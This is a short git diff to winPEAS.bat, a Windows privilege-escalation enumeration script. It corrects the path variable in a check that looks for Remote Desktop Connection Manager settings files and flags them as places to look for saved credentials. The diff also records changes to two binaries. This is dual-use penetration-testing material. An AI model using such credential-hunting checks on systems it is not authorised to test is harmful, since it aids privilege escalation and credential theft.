a/win/winPEAS.bat +++ b/win/winPEAS.bat @@ -237,7 +237,7 @@ CALL :T_Progress 2 :RemodeDeskCredMgr CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager -IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files +IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files ECHO. CALL :T_Progress 1 diff --git a/win/winPEAS.exe b/win/winPEAS.exe index c4f2eb6..cbcccb0 100644 Binary files a/win/winPEAS.exe and b/win/winPEAS.exe differ diff --git a/win/winPEASx64.exe b/win/winPEASx64.exe index cde6d03..dbf4928 100644 Binary files a/win/winPEASx64.exe and b/win/winPEASx64.exe differ